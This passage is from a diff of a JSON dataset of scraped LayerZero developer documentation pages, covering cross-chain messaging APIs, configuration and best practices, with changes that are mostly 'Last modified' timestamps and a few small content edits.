commonly used in most UAs. You can use them directly as they are already deployed by LayerZero, or you can copy them to your own modules and modify them to fit your needs. LZApp The LZApp module provides a simple way for you to manage your UA's configurations and handle error messages. 1. Provides entry functions to config instead of calling from app with UaCapability 2. Allows the app to drop/store the next payload 3. Enables to send a layerzero message with Aptos coin and/or ZRO coin It is very simple to use it, initializing by calling the following in your UA: fun init(account: &signer, cap: UaCapability) LayerZero-Aptos-Contract/lzapp.move at main LayerZero-Labs/LayerZero-Aptos-Contract GitHub LZApp Module LayerZero-Aptos-Contract/remote.move at main LayerZero-Labs/LayerZero-Aptos-Contract GitHub LZApp Remote Module Previous Receive Messages Next - Aptos Guide Code Examples Last modified 11mo ago", "labels": [ "Documentation" ] @@ -1138,7 +1138,7 @@ { "title": "Getting Started", "html_url": "https://layerzero.gitbook.io/docs/aptos-guide/master", - "body": "Getting Started Developing on LayerZero is as simple as it gets - just implement the register_ua() , send() and lz_receive() interfaces and your app is ready to send messages across connected chains. To get started, check register_ua() , send() and lz_receive() . Or dive right in with a simple code example here . FAQ Learn answers to Frequently Asked Questions . Talk to the Team Twitter Telegram Discord Medium Official Website https://layerzero.network/ EVM Guides - Previous Omnichain Governance Next Register UA Last modified 10mo ago", + "body": "Getting Started Developing on LayerZero is as simple as it gets - just implement the register_ua() , send() and lz_receive() interfaces and your app is ready to send messages across connected chains. To get started, check register_ua() , send() and lz_receive() . Or dive right in with a simple code example here . FAQ Learn answers to Frequently Asked Questions . Talk to the Team Twitter Telegram Discord Medium Official Website https://layerzero.network/ EVM Guides - Previous Omnichain Governance Next Register UA Last modified 1yr ago", "labels": [ "Documentation" ] @@ -1146,7 +1146,7 @@ { "title": "UA Custom Configuration", "html_url": "https://layerzero.gitbook.io/docs/aptos-guide/ua-custom-configuration", - "body": "UA Custom Configuration User Application contracts may set their own configuration for message library, relayer, oracle, etc. public fun set_config < UA > ( major_version : u64 , minor_version : u8 , chain_id : u64 , config_type : u8 , config_bytes : vector < u8 > , _cap : & UaCapability < UA > ) public fun set_send_msglib < UA > ( chain_id : u64 , major_version : u64 , minor_version : u8 , _cap : & UaCapability < UA > ) public fun set_receive_msglib < UA > ( chain_id : u64 , major_version : u64 , minor_version : u8 , _cap : & UaCapability < UA > ) public fun set_executor < UA > ( chain_id : u64 , version : u64 , executor : address , _cap : & UaCapability < UA > ) Previous Estimating Message Fees Next - Ecosystem Relayer Last modified 13d ago", + "body": "UA Custom Configuration User Application contracts may set their own configuration for message library, relayer, oracle, etc. public fun set_config < UA > ( major_version : u64 , minor_version : u8 , chain_id : u64 , config_type : u8 , config_bytes : vector < u8 > , _cap : & UaCapability < UA > ) public fun set_send_msglib < UA > ( chain_id : u64 , major_version : u64 , minor_version : u8 , _cap : & UaCapability < UA > ) public fun set_receive_msglib < UA > ( chain_id : u64 , major_version : u64 , minor_version : u8 , _cap : & UaCapability < UA > ) public fun set_executor < UA > ( chain_id : u64 , version : u64 , executor : address , _cap : & UaCapability < UA > ) Previous Estimating Message Fees Next - Ecosystem Relayer Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1154,7 +1154,7 @@ { "title": "Bug Bounty Program", "html_url": "https://layerzero.gitbook.io/docs/bug-bounty/bug-bounty-program", - "body": "Bug Bounty Program LayerZero has an absolute commitment to continuously evaluating and improving security, to demonstrate this we are pleased to run the largest live bug bounty program across the industry at up to $15M! You can read more about the program and make reports via Immunefi . To date LayerZero has awarded almost $1M to white hats that have made disclosures. A separate bug bounty of up to $2M exists specifically covering The Aptos Bridge , which will in time increase in scope to join the above program. More details on this separate bounty program can be found here . Previous What is LayerZero Next - Concepts Messaging Properties Last modified 12d ago", + "body": "Bug Bounty Program LayerZero has an absolute commitment to continuously evaluating and improving security, to demonstrate this we are pleased to run the largest live bug bounty program across the industry at up to $15M! You can read more about the program and make reports via Immunefi . To date LayerZero has awarded almost $1M to white hats that have made disclosures. A separate bug bounty of up to $2M exists specifically covering The Aptos Bridge , which will in time increase in scope to join the above program. More details on this separate bounty program can be found here . Previous What is LayerZero Next - Concepts Messaging Properties Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1162,7 +1162,7 @@ { "title": "Oracle", "html_url": "https://layerzero.gitbook.io/docs/ecosystem/oracle", - "body": "Oracle Helps secure the network. Each User Application can opt-in to any Oracle LayerZero's default oracle provider will be updated as of 9/19/23 , details of which you can find here . The Oracle performs a role in securing LayerZero's messaging protocol by moving data between chains. Each oracle has the task of moving a requested block header from a source chain to a destination chain. An oracle works in tandem with a Relayer . Each User Application contract built on LayerZero will work without configuration using defaults, but a UA will also be able to configure its own Oracle and Relayer . Previous Max Proof Cost Estimate Next Default Oracle Updates Last modified 13d ago", + "body": "Oracle Helps secure the network. Each User Application can opt-in to any Oracle LayerZero's default oracle provider will be updated as of 9/19/23 , details of which you can find here . The Oracle performs a role in securing LayerZero's messaging protocol by moving data between chains. Each oracle has the task of moving a requested block header from a source chain to a destination chain. An oracle works in tandem with a Relayer . Each User Application contract built on LayerZero will work without configuration using defaults, but a UA will also be able to configure its own Oracle and Relayer . Previous Max Proof Cost Estimate Next Default Oracle Updates Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1170,7 +1170,7 @@ { "title": "Relayer", "html_url": "https://layerzero.gitbook.io/docs/ecosystem/relayer", - "body": "Relayer Relayers perform a critical role in the LayerZero message protocol by delivering messages. Relayers work in tandem with an Oracle to transmit messages between chains. By default, User Applications will use the LayerZero Relayer. This means you do not need to run your own Relayer. If you want to select a custom Relayer you will need to set a custom UA configuration . If you wish to learn more about operating and/or building your own Relayer read on. Aptos Guide - Previous UA Custom Configuration Next Overview Last modified 16d ago", + "body": "Relayer Relayers perform a critical role in the LayerZero message protocol by delivering messages. Relayers work in tandem with an Oracle to transmit messages between chains. By default, User Applications will use the LayerZero Relayer. This means you do not need to run your own Relayer. If you want to select a custom Relayer you will need to set a custom UA configuration . If you wish to learn more about operating and/or building your own Relayer read on. Aptos Guide - Previous UA Custom Configuration Next Overview Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1178,7 +1178,7 @@ { "title": "Advanced", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/advanced", - "body": "Advanced Looking to set your UA configuration ? Check here to set a custom blockConfirmations and other UA app config values. Previous Set Trusted Remotes Next Development Staging Last modified 1yr ago", + "body": "Advanced Looking to set your UA configuration ? Check here to set a custom blockConfirmations and other UA app config values. Previous Set Trusted Remotes Next Development Staging Last modified 1d ago", "labels": [ "Documentation" ] @@ -1186,7 +1186,7 @@ { "title": "Best Practice", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/best-practice", - "body": "Best Practice It is highly recommended User Applications implement the ILayerZeroApplicationConfig . Implementing this interface will provide you with forceResumeReceive which, in the worse case can allow the owner/multisig to unblock the queue of messages if something unexpected happens. Instant Finality Guarantee (IFG) Reverting in UA is cumbersome and expensive. It is more efficient to design your UA with IFG such that if a transaction was accepted at source, the transaction will be accepted at the remote. For example, Stargate has a credit management system (Delta Algorithm) to guarantee that if a swap was accepted at source, the destination must have enough asset to complete the swap, hence the IFG. Tracking the Nonce It is important for UA to keep track of their own nonce (e.g. by events) to correlate the send and receive side transactions. UA at send() side can query the nonce at endpoint.getOutboundNonce interface, and in lzReceive() the inboundNonce is in the arguments. One Action Per Message Try to do only one thing per message. The implication is that if the message was burnt (misconfiguration, bad code etc.. the damage to the state is minimal. Store Failed Messages If the message execution fails at the destination, try-catch, and store it for future retry. From LayerZero's perspective, the message has been delivered. It is much cheaper and easier for your programs to recover from the last state at the destination chain. Store a hash of the message payload is much cheaper than storing the whole message. Gas for Message Types If your app includes multiple message types to be sent across chains, compute a rough gas estimate at the destination chain per each message type . Your message may fail for the out-of-gas exception at the destination if your app did not instruct the relayer to put extra gas on contract execution. And the UA should enforce the gas estimate on-chain at the source chain to prevent users from inputting too low the value for gas. Address Sanity Check Check the address size according to the source chain (e.g. address size == 20 bytes on EVM chains) to prevent a vector unauthenticated contract call. Messages Encoding Use type-safe bytes codec. Use custom codec only if you are comfortable with it and your app requires deep optimization. Previous Failure Revert Messages Next - EVM Guides LayerZero Omnichain Contracts Last modified 1yr ago", + "body": "Best Practice It is highly recommended User Applications implement the ILayerZeroApplicationConfig . Implementing this interface will provide you with forceResumeReceive which, in the worse case can allow the owner/multisig to unblock the queue of messages if something unexpected happens. Instant Finality Guarantee (IFG) Reverting in UA is cumbersome and expensive. It is more efficient to design your UA with IFG such that if a transaction was accepted at source, the transaction will be accepted at the remote. For example, Stargate has a credit management system (Delta Algorithm) to guarantee that if a swap was accepted at source, the destination must have enough asset to complete the swap, hence the IFG. Tracking the Nonce It is important for UA to keep track of their own nonce (e.g. by events) to correlate the send and receive side transactions. UA at send() side can query the nonce at endpoint.getOutboundNonce interface, and in lzReceive() the inboundNonce is in the arguments. One Action Per Message Try to do only one thing per message. The implication is that if the message was burnt (misconfiguration, bad code etc.. the damage to the state is minimal. Store Failed Messages If the message execution fails at the destination, try-catch, and store it for future retry. From LayerZero's perspective, the message has been delivered. It is much cheaper and easier for your programs to recover from the last state at the destination chain. Store a hash of the message payload is much cheaper than storing the whole message. Gas for Message Types If your app includes multiple message types to be sent across chains, compute a rough gas estimate at the destination chain per each message type . Your message may fail for the out-of-gas exception at the destination if your app did not instruct the relayer to put extra gas on contract execution. And the UA should enforce the gas estimate on-chain at the source chain to prevent users from inputting too low the value for gas. Address Sanity Check Check the address size according to the source chain (e.g. address size == 20 bytes on EVM chains) to prevent a vector unauthenticated contract call. Messages Encoding Use type-safe bytes codec. Use custom codec only if you are comfortable with it and your app requires deep optimization. Previous Failure Revert Messages Next - EVM Guides LayerZero Omnichain Contracts Last modified 21d ago", "labels": [ "Documentation" ] @@ -1194,7 +1194,7 @@ { "title": "Code Examples", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/code-examples", - "body": "Code Examples Take a look at our Solidity Examples repo or some great template code to get you started It is recommended User Applications implement NonblockingLzApp which allow you to easily override two functions to add send + receive functionality to your contracts! GitHub - LayerZero-Labs/solidity-examples: example contracts GitHub LayerZero Solidity Examples npm: @layerzerolabs/solidity-examples npm NPM package to go along with Solidity Examples The primary way to implement LayerZero messaging in your contract is to use LzApp or NonblockingLzApp: solidity-examples/contracts/lzApp at main LayerZero-Labs/solidity-examples GitHub There are implementations of Tokens (OFT) and NFTs (ONFT) as well: solidity-examples/contracts/examples at main LayerZero-Labs/solidity-examples GitHub Previous UA Configuration Lock Next OmniCounter.sol Last modified 3mo ago", + "body": "Code Examples Take a look at our Solidity Examples repo or some great template code to get you started It is recommended User Applications implement NonblockingLzApp which allow you to easily override two functions to add send + receive functionality to your contracts! GitHub - LayerZero-Labs/solidity-examples: example contracts GitHub LayerZero Solidity Examples npm: @layerzerolabs/solidity-examples npm NPM package to go along with Solidity Examples The primary way to implement LayerZero messaging in your contract is to use LzApp or NonblockingLzApp: solidity-examples/contracts/lzApp at main LayerZero-Labs/solidity-examples GitHub There are implementations of Tokens (OFT) and NFTs (ONFT) as well: solidity-examples/contracts/examples at main LayerZero-Labs/solidity-examples GitHub Previous UA Configuration Lock Next OmniCounter.sol Last modified 15d ago", "labels": [ "Documentation" ] @@ -1202,15 +1202,7 @@ { "title": "Error Messages", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/error-messages", - "body": "Error Messages The most common problem: Not sending msg.value when calling send() on the endpoint. See notes here. See here for how much msg.value to send to cover the message cost. Is your transaction failing on destination with an unhelpful messages like this: ? Make sure you are sending the message to a destination contract that exists! If you've experimented with custom configuration, review the docs here For a description of every possible onchain failure take a look at this page . Previous ILayerZeroRelayer.sol Next StoredPayload Last modified 1yr ago", - "labels": [ - "Documentation" - ] - }, - { - "title": "Interfaces", - "html_url": "https://layerzero.gitbook.io/docs/evm-guides/interfaces", - "body": "Interfaces Interfaces to the LayerZero contracts Interfaces for interacting with LayerZero contracts, including the Endpoint . Previous PingPong.sol Next EVM (Solidity) Interfaces Last modified 1yr ago", + "body": "Error Messages The most common problem: Not sending msg.value when calling send() on the endpoint. See notes here. See here for how much msg.value to send to cover the message cost. Is your transaction failing on destination with an unhelpful messages like this: ? Make sure you are sending the message to a destination contract that exists! If you've experimented with custom configuration, review the docs here For a description of every possible onchain failure take a look at this page . Previous PingPong.sol Next StoredPayload Last modified 21d ago", "labels": [ "Documentation" ] @@ -1218,7 +1210,7 @@ { "title": "LayerZero Integration Checklist", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/layerzero-integration-checklist", - "body": "LayerZero Integration Checklist The checklist below is intended to help prepare a project that integrates LayerZero for an external audit or Mainnet deployment Use the latest version of solidity-examples package. Do not copy contracts from LayerZero repositories directly to your project. If your project requires token bridging inherit your token from OFT or ONFT . For new tokens use OFT or ONFT , for bridging existing tokens use ProxyOFT or ProxyONFT . For bridging only between EVM chains use OFT and for bridging between EVM and non EVM chains (e.g., Aptos) use OFTV2 . Do not hardcode LayerZero chain Ids. Use admin restricted setters instead. Do not hardcode address zero ( address(0) ) as zroPaymentAddress when estimating fees and sending messages. Pass it as a parameter instead. Do not hardcode useZro to false when estimating fees and sending messages. Pass it as a parameter instead. Do not hardcode zero bytes ( bytes(0) ) as adapterParamers . Pass them as a parameter instead. Make sure to test the amount of gas required for the execution on the destination. Use custom adapter parameters and specify minimum destination gas for each cross-chain path when the default amount of gas ( 200,000 ) is not enough. This requires whoever calls the send function to provide the adapter params with a destination gas >= amount set in the minDstGasLookup for that chain. So that your users don't run into failed messages on the destination. It makes it a smoother end-to-end experience for all. Do not add requires statements that repeat existing checks in the parent contracts. For example, lzReceive function in LzApp contract checks that the message sender is LayerZero endpoint and the scrAddress is a trusted remote, do not perform the same checks in nonblockingLzReceive . If your contract derives from LzApp , do not call lzEndpoint.send directly, use _lzSend . For ONFTs that allow minting a range of tokens on each chain, make the variables that specify the range (e.g. startMintId and endMintId) immutable. Previous 1155 Next - EVM Guides LayerZero Tooling Last modified 7mo ago", + "body": "LayerZero Integration Checklist The checklist below is intended to help prepare a project that integrates LayerZero for an external audit or Mainnet deployment Use the latest version of solidity-examples package. Do not copy contracts from LayerZero repositories directly to your project. If your project requires token bridging inherit your token from OFT or ONFT . For new tokens use OFT or ONFT , for bridging existing tokens use ProxyOFT or ProxyONFT . For bridging only between EVM chains use OFT and for bridging between EVM and non EVM chains (e.g., Aptos) use OFTV2 . Do not hardcode LayerZero chain Ids. Use admin restricted setters instead. Do not hardcode address zero ( address(0) ) as zroPaymentAddress when estimating fees and sending messages. Pass it as a parameter instead. Do not hardcode useZro to false when estimating fees and sending messages. Pass it as a parameter instead. Do not hardcode zero bytes ( bytes(0) ) as adapterParamers . Pass them as a parameter instead. Set setUseCustomAdapterParams as True for OFT and ONFT Test the amount of gas required for the execution on the destination chain. Use custom adapter parameters and specify the minimum destination gas for each cross-chain path when the default amount of gas ( 200,000 ) is not enough. Call setMinDstGas to set the minimum gas. (200k for OFT for all EVMs except Arbitrum is enough. For Arbitrum, set as 2M. ) This requires whoever calls the send function to provide the adapter params with a destination gas >= amount set in the minDstGasLookup for that chain. So that your users don't run into failed messages on the destination. It makes it a smoother end-to-end experience for all. Do not add requires statements that repeat existing checks in the parent contracts. For example, lzReceive function in LzApp contract checks that the message sender is LayerZero endpoint and the scrAddress is a trusted remote, do not perform the same checks in nonblockingLzReceive . If your contract derives from LzApp , do not call lzEndpoint.send directly, use _lzSend . For ONFTs that allow minting a range of tokens on each chain, make the variables that specify the range (e.g. startMintId and endMintId) immutable. Previous 1155 Next - EVM Guides LayerZero Tooling Last modified 20h ago", "labels": [ "Documentation" ] @@ -1226,7 +1218,7 @@ { "title": "LayerZero Omnichain Contracts", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/layerzero-omnichain-contracts", - "body": "LayerZero Omnichain Contracts Want to send your tokens cross chain? OFT Omnichain Fungible Tokens enable a token to be sent across current (and even future) chains! There is no requirement for liquidity, and there are no fees! ONFT Omnichain Non Fungible Tokens allow your NFT project to send tokens across chains. See the Lil Pudgies bridge in action! EVM Guides - Previous Best Practice Next OFT Last modified 7mo ago", + "body": "LayerZero Omnichain Contracts Want to send your tokens cross chain? OFT Omnichain Fungible Tokens enable a token to be sent across current (and even future) chains! There is no requirement for liquidity, and there are no fees! ONFT Omnichain Non Fungible Tokens allow your NFT project to send tokens across chains. See the Lil Pudgies bridge in action! EVM Guides - Previous Best Practice Next OFT Last modified 5d ago", "labels": [ "Documentation" ] @@ -1234,7 +1226,7 @@ { "title": "LayerZero Tooling", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/layerzero-tooling", - "body": "LayerZero Tooling Configuration tools around setting up your UA Config and Wire Up Config A set of common tasks for contracts integrating LayerZero Installation $ npm install @layerzerolabs/ua-utils The plugin depends on @nomiclabs/hardhat-ethers , so you need to import both plugins in your hardhat.config.js : require ( \"@nomiclabs/hardhat-ethers\" ); require ( \"@layerzerolabs/ua-utils\" ); Or if you are using TypeScript, in your hardhat.config.ts : import \"@nomiclabs/hardhat-ethers\" ; import \"@layerzerolabs/ua-utils\" ; UA Config This config is used to Lock in UA Configuration . To use this script please fill in your Application Configuration according to your applications needs. Wire Up Configuration This config can be used to set the following on your UA contract: function setFeeBp(uint16, bool, uint16) function setDefaultFeeBp(uint16) function setMinDstGas(uint16, uint16, uint) function setUseCustomAdapterParams(bool) function setTrustedRemote(uint16, bytes) To use this script please fill in your Wire Up Configuration according to your applications needs. EVM Guides - Previous LayerZero Integration Checklist Next UA Configuration Last modified 3mo ago", + "body": "LayerZero Tooling Configuration tools around setting up your UA Config and Wire Up Config A set of common tasks for contracts integrating LayerZero Installation $ npm install @layerzerolabs/ua-utils The plugin depends on @nomiclabs/hardhat-ethers , so you need to import both plugins in your hardhat.config.js : require ( \"@nomiclabs/hardhat-ethers\" ); require ( \"@layerzerolabs/ua-utils\" ); Or if you are using TypeScript, in your hardhat.config.ts : import \"@nomiclabs/hardhat-ethers\" ; import \"@layerzerolabs/ua-utils\" ; UA Config This config is used to Lock in UA Configuration . To use this script please fill in your Application Configuration according to your applications needs. Wire Up Configuration This config can be used to set the following on your UA contract: function setFeeBp(uint16, bool, uint16) function setDefaultFeeBp(uint16) function setMinDstGas(uint16, uint16, uint) function setUseCustomAdapterParams(bool) function setTrustedRemote(uint16, bytes) To use this script please fill in your Wire Up Configuration according to your applications needs. EVM Guides - Previous LayerZero Integration Checklist Next UA Configuration Last modified 4mo ago", "labels": [ "Documentation" ] @@ -1242,7 +1234,7 @@ { "title": "Getting Started", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/master", - "body": "Getting Started Developing on LayerZero is as simple as it gets - just implement the send() and lzReceive() interfaces and your app is ready to send messages across connected chains. To get started, check send() and lzReceive() . Or dive right in with a simple code example here . FAQ Learn answers to Frequently Asked Questions . User Applications User Application contracts built on LayerZero send secure messages between different blockchains! Here is an example of a OmnichainFungibleToken (OFT) Talk to the Team Twitter Telegram Discord (join dev-announcements for updates!) Medium Official Website https://layerzero.network/ Concepts - Previous FAQ Next Send Messages Last modified 10mo ago", + "body": "Getting Started Developing on LayerZero is as simple as it gets - just implement the send() and lzReceive() interfaces and your app is ready to send messages across connected chains. To get started, check send() and lzReceive() . Or dive right in with a simple code example here . FAQ Learn answers to Frequently Asked Questions . User Applications User Application contracts built on LayerZero send secure messages between different blockchains! Here is an example of a OmnichainFungibleToken (OFT) Talk to the Team Twitter Telegram Discord (join dev-announcements for updates!) Medium Official Website https://layerzero.network/ Concepts - Previous FAQ Next Send Messages Last modified 1yr ago", "labels": [ "Documentation" ] @@ -1250,7 +1242,7 @@ { "title": "Omnichain Governance", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/omnichain-governance", - "body": "Omnichain Governance LayerZero enables multichain governance solutions. All votes. All chains. Recently, the team produced contracts for omnichain governance for Uniswap . Take a look! GitHub - LayerZero-Labs/omnichain-governance-executor GitHub Previous Wire Up Configuration Next - Aptos Guide Getting Started Last modified 3mo ago", + "body": "Omnichain Governance LayerZero enables multichain governance solutions. All votes. All chains. Recently, the team produced contracts for omnichain governance for Uniswap . Take a look! GitHub - LayerZero-Labs/omnichain-governance-executor GitHub Previous Wire Up Configuration Next - Aptos Guide Getting Started Last modified 4mo ago", "labels": [ "Documentation" ] @@ -1258,7 +1250,7 @@ { "title": "UA Custom Configuration", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/ua-custom-configuration", - "body": "UA Custom Configuration User Application contracts may set their own configuration for block confirmation, send version, relayer, oracle, etc. When a UA wishes to configure their own block confirmations both the outboundBlockConfirmations of the source and the inboundBlockConfirmations of the destination must be configured and match. How to Configure A User Application (UA) can use non-default protocol settings, and to do so it must implement the interface ILayerZeroUserApplicationConfig . The UA may then manually update its ApplicationConfig . See examples below as well as the CONFIG_TYPES . Set: Inbound Proof Library 1 let config = ethers . utils . defaultAbiCoder . encode ( 2 [ \"uint16\" ], 3 [ inboundProofLibraryVersion ] 4 ) 5 await lzEndpoint . setConfig ( 6 0 , 7 dstChainId , 8 CONFIG_TYPE_INBOUND_PROOF_LIBRARY_VERSION , 9 config 10 ) Set: Inbound Block Confirmations 1 let config = ethers . utils . defaultAbiCoder . encode ( 2 [ \"uint16\" ], 3 [ 42 ] 4 ) 5 await lzEndpoint . setConfig ( 6 0 , 7 dstChainId , 8 CONFIG_TYPE_INBOUND_BLOCK_CONFIRMATIONS , 9 config 10 ) Set: Relayer 1 let config = ethers . utils . solidityPack ( 2 [ \"address\" ], 3 [ relayerAddr ] 4 ) 5 await lzEndpoint . setConfig ( 6 0 , 7 dstChainId , 8 CONFIG_TYPE_RELAYER , 9 config 10 ) Set: Outbound Proof Type/LibraryVersion 1 let config = ethers . utils . defaultAbiCoder . encode ( 2 [ \"uint16\" ], 3 [ outboundProofType ] 4 ) 5 await lzEndpoint . setConfig ( 6 0 , 7 dstChainId , 8 CONFIG_TYPE_OUTBOUND_PROOF_TYPE , 9 config 10 ) Set: Outbound Block Confirmations 1 let config = ethers . utils . defaultAbiCoder . encode ( 2 [ \"uint16\" ], 3 [ 17 ] // outbound block confirmations 4 ) 5 await lzEndpoint . setConfig ( 6 0 , 7 dstChainId , 8 CONFIG_TYPE_OUTBOUND_BLOCK_CONFIRMATIONS , 9 config 10 ) Set: Oracle Oracle settings are configured per channel pathway, meaning UAs who want to lock Oracle configs will need to call setConfig per chain pairing. 1 let config = ethers . utils . defaultAbiCoder . encode ( 2 [ \"address\" ], 3 [ oracleAddr ] 4 ) 5 await lzEndpoint . setConfig ( 6 0 , 7 dstChainId , 8 CONFIG_TYPE_ORACLE , 9 config 10 ) Config Types CONFIG_TYPE_INBOUND_PROOF_LIBRARY_VERSION 1 CONFIG_TYPE_INBOUND_BLOCK_CONFIRMATIONS 2 CONFIG_TYPE_RELAYER 3 CONFIG_TYPE_OUTBOUND_PROOF_TYPE 4 CONFIG_TYPE_OUTBOUND_BLOCK_CONFIRMATIONS 5 CONFIG_TYPE_ORACLE 6 Previous NonblockingLzApp Next UA Configuration Lock Last modified 10d ago", + "body": "UA Custom Configuration User Application contracts may set their own configuration for block confirmation, send version, relayer, oracle, etc. When a UA wishes to configure their own block confirmations both the outboundBlockConfirmations of the source and the inboundBlockConfirmations of the destination must be configured and match. How to Configure A User Application (UA) can use non-default protocol settings, and to do so it must implement the interface ILayerZeroUserApplicationConfig . The UA may then manually update its ApplicationConfig . See examples below as well as the CONFIG_TYPES . Set: Inbound Proof Library 1 let config = ethers . utils . defaultAbiCoder . encode ( 2 [ \"uint16\" ], 3 [ inboundProofLibraryVersion ] 4 ) 5 await lzEndpoint . setConfig ( 6 0 , 7 dstChainId , 8 CONFIG_TYPE_INBOUND_PROOF_LIBRARY_VERSION , 9 config 10 ) Set: Inbound Block Confirmations 1 let config = ethers . utils . defaultAbiCoder . encode ( 2 [ \"uint16\" ], 3 [ 42 ] 4 ) 5 await lzEndpoint . setConfig ( 6 0 , 7 dstChainId , 8 CONFIG_TYPE_INBOUND_BLOCK_CONFIRMATIONS , 9 config 10 ) Set: Relayer 1 let config = ethers . utils . solidityPack ( 2 [ \"address\" ], 3 [ relayerAddr ] 4 ) 5 await lzEndpoint . setConfig ( 6 0 , 7 dstChainId , 8 CONFIG_TYPE_RELAYER , 9 config 10 ) Set: Outbound Proof Type/LibraryVersion 1 let config = ethers . utils . defaultAbiCoder . encode ( 2 [ \"uint16\" ], 3 [ outboundProofType ] 4 ) 5 await lzEndpoint . setConfig ( 6 0 , 7 dstChainId , 8 CONFIG_TYPE_OUTBOUND_PROOF_TYPE , 9 config 10 ) Set: Outbound Block Confirmations 1 let config = ethers . utils . defaultAbiCoder . encode ( 2 [ \"uint16\" ], 3 [ 17 ] // outbound block confirmations 4 ) 5 await lzEndpoint . setConfig ( 6 0 , 7 dstChainId , 8 CONFIG_TYPE_OUTBOUND_BLOCK_CONFIRMATIONS , 9 config 10 ) Set: Oracle Oracle settings are configured per channel pathway, meaning UAs who want to lock Oracle configs will need to call setConfig per chain pairing. 1 let config = ethers . utils . defaultAbiCoder . encode ( 2 [ \"address\" ], 3 [ oracleAddr ] 4 ) 5 await lzEndpoint . setConfig ( 6 0 , 7 dstChainId , 8 CONFIG_TYPE_ORACLE , 9 config 10 ) Config Types CONFIG_TYPE_INBOUND_PROOF_LIBRARY_VERSION 1 CONFIG_TYPE_INBOUND_BLOCK_CONFIRMATIONS 2 CONFIG_TYPE_RELAYER 3 CONFIG_TYPE_OUTBOUND_PROOF_TYPE 4 CONFIG_TYPE_OUTBOUND_BLOCK_CONFIRMATIONS 5 CONFIG_TYPE_ORACLE 6 Previous NonblockingLzApp Next UA Configuration Lock Last modified 6d ago", "labels": [ "Documentation" ] @@ -1266,7 +1258,7 @@ { "title": "FAQ", "html_url": "https://layerzero.gitbook.io/docs/faq/faq-1", - "body": "FAQ Frequently Asked Questions What is LayerZero? LayerZero enables messages to be sent between blockchains. How do I send a cross-chain message? See example contracts here and details on sending messages here . What blockchains are supported? See a table of supported blockchains . The team is always working to add more chains, so check back frequently! What is a User Application? A User Application (UA) is any contract that uses LayerZero to send & receive messages between blockchains. What is an Endpoint? The deployed contract on which your User Application calls send() to transmit messages and set its own UA configuration. Heres is the list of endpoint addresses with which you may interact with. What is an Ultra Light Node? The UltraLightNode.sol is a smart contract at the heart of the message protocol, sitting behind the Endpoint, it enables all the features of LayerZero. In the future, UAs will benefit from new versions of the Ultra Light Node, the most recent version of the ULN is v2. What is an Oracle? An Oracle is required by each User Application and assists in sending messages. User Applications use the default Oracle automatically so you don't need you configure it, but you can if you want to. What is a Relayer? User Applications use the LayerZero Relayer by default, without additional configuration. However, a Relayer is required by each User Application and plays a crucial role in delivering cross chain messages. If desirable, User Applications may be configured to use a different relayer. Technical Section Two Modes: Blocking and Nonblocking: LayerZero UserApplications can choose to be Blocking or Nonblocking (see the examples ). All messages are nonce-ordered, which means they will arrive from a source chain & source UA address in the order they are sent. By default, messages will be queued if there is an out-of-gas, or logical error on the destination. If contract developers wish to avoid the default blocking mechanism, instead use NonblockingLzApp which will continue with the flow of messages, a design which stores out-of-gas messages on the destination to be retried (by anyone) at anytime. Can LayerZero users enjoy the benefit of any future optimized proof technology, e.g. ZKP based? Yes, LayerZero has the ability to add new Messaging Libraries. LayerZero Labs will keep bringing the best research into production. Existing users can easily perform a library migration on-chain. Concepts - Previous Glossary Next - EVM Guides Getting Started Last modified 3mo ago", + "body": "FAQ Frequently Asked Questions What is LayerZero? LayerZero enables messages to be sent between blockchains. How do I send a cross-chain message? See example contracts here and details on sending messages here . What blockchains are supported? See a table of supported blockchains . The team is always working to add more chains, so check back frequently! What is a User Application? A User Application (UA) is any contract that uses LayerZero to send & receive messages between blockchains. What is an Endpoint? The deployed contract on which your User Application calls send() to transmit messages and set its own UA configuration. Heres is the list of endpoint addresses with which you may interact with. What is an Ultra Light Node? The UltraLightNode.sol is a smart contract at the heart of the message protocol, sitting behind the Endpoint, it enables all the features of LayerZero. In the future, UAs will benefit from new versions of the Ultra Light Node, the most recent version of the ULN is v2. What is an Oracle? An Oracle is required by each User Application and assists in sending messages. User Applications use the default Oracle automatically so you don't need you configure it, but you can if you want to. What is a Relayer? User Applications use the LayerZero Relayer by default, without additional configuration. However, a Relayer is required by each User Application and plays a crucial role in delivering cross chain messages. If desirable, User Applications may be configured to use a different relayer. Technical Section Two Modes: Blocking and Nonblocking: LayerZero UserApplications can choose to be Blocking or Nonblocking (see the examples ). All messages are nonce-ordered, which means they will arrive from a source chain & source UA address in the order they are sent. By default, messages will be queued if there is an out-of-gas, or logical error on the destination. If contract developers wish to avoid the default blocking mechanism, instead use NonblockingLzApp which will continue with the flow of messages, a design which stores out-of-gas messages on the destination to be retried (by anyone) at anytime. Can LayerZero users enjoy the benefit of any future optimized proof technology, e.g. ZKP based? Yes, LayerZero has the ability to add new Messaging Libraries. LayerZero Labs will keep bringing the best research into production. Existing users can easily perform a library migration on-chain. Concepts - Previous Glossary Next - EVM Guides Getting Started Last modified 4mo ago", "labels": [ "Documentation" ] @@ -1274,7 +1266,7 @@ { "title": "Future-Proof Architecture", "html_url": "https://layerzero.gitbook.io/docs/faq/future-proof-architecture", - "body": "Future-Proof Architecture Immutable Endpoint LayerZero Endpoint is the only interface for a User Application (UA). The Endpoint allows UAs to configure the Messaging Library used for sending and receiving verified messages, and guarantees the message delivering ordering across all messaging libraries. Send() : the message will be sent through the endpoint first and then redirected to the UA-configured Messaging Library Receive() : the message will be verified at the Messaging Library first then forwarded to the endpoint and eventually delivered to the UA. Perpetual Messaging All Messaging Libraries, once deployed, will be in service in perpetuity, which means that no entity, including the LayerZero Labs multi-sig, can de-register any Messaging Library or change the Messaging Library configuration of a UA, i.e. if the UA has specified a Messaging Library to use, no entity can stop the messaging flow. Continuous Improvement LayerZero can deploy new Messaging Libraries for security and performance optimization 